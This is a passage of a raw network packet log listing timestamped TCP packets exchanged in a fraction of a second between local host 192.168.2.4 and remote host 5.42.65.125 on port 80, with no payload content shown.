Dec 27, 2023 17:57:26.109620094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.109715939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109730005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109745026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109756947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.109761000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109781027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.110158920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110192060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110203028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.110208035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110225916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110241890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110256910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110261917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.110272884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110301018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.110316992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110317945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.110332012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110347986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110373020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.110744953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110759974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110774040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110786915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110789061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.110801935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110810995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.110816956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110831976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110840082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.110846996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110862017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110876083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110883951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.110889912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110902071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.110905886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110920906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110929966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.110965967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.110980988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.110995054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.111008883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.111022949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.111032009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.111037970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.111052990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.111061096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.111068964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.111095905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.111613989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.111788034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.111836910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.111830950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.111874104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.111879110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.112036943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112054110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112066031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112081051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112093925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.112097025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112113953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112126112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.112128019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112143993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112145901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.112159014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112165928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.112174034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112189054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112200022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.112200975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112222910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112227917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.112245083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112258911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112273932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112274885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.112298965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.112648010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112663031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112678051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112689018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.112694025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112710953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112715006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.112746000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112754107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.112761021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112802982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.112835884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112853050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112865925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.112905025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.113063097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113101959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113106012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.113167048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113183022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113197088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113219023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.113246918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113250971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.113264084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113276958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113297939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.113305092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113320112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113339901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.113358974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113387108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113399982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113400936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.113415003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113440990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.113497972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113516092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113528967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113547087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113552094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.113562107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113584042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.113584995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.113605976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.114059925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114075899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114089012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114101887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.114104986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114120007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114135027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.114139080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114156008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114159107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.114191055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.114195108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114209890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114223957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114248991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114258051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.114291906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.114357948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114375114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114389896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114403963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114418030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114428997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.114432096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114445925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114459991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114459991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.114479065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.114480019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.114499092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115040064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115056992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115097046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115227938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115243912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115257978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115266085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115295887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115298986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115394115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115407944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115421057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115433931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115451097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115478992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115478992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115495920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115509987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115514040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115537882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115556002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115636110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115649939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115664005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115677118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115684032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115695953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115710974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115719080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115727901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115737915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115745068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115765095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115767956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115782976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115796089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115798950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115813971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115828991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115838051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115842104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115859032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115866899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.115873098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.115900040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.116444111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116527081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116542101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116556883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116570950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.116571903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116596937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.116619110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.116724014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116738081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116754055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116765976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116779089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.116782904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116799116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116806984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.116815090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116832018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116846085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116849899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.116859913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116873980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116883039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.116887093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116900921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.116900921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116918087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116931915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.116935968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.116967916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.117419958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.117448092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.117458105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.117465019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.117531061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.117546082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.117558956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.117568016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.117578030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.117594004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.117605925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.117609978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.117624998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.117628098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.117652893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.117995977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118011951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118024111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118033886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.118047953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118062973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118066072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.118077993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118096113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.118098974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118114948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118128061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118134022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.118168116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.118252993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118268013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118280888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118295908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118307114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.118308067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118323088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118335962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.118336916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118351936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118356943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.118367910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118381977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118396044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118397951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.118417978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.118875027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118891954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118933916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.118938923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118968964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118983030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.118983984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.118999958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119023085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.119029999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119070053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.119132042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119147062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119160891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119174957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119189024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119201899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.119204998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119219065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119230032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.119234085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119252920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.119254112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119270086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119277000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.119287968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119301081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119312048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.119316101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119353056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.119870901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.119913101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.119959116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120028019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120043993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120078087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120083094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.120112896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120119095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.120131016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120146990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120162964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120178938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120183945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.120227098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.120385885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120400906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120424032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.120456934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120471954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120486021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120500088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.120501041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120517969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120524883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.120552063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.120605946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120621920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120635986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120655060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120667934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120680094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.120682001 CET	80	49738	5.42.65.125	192.168.2.4
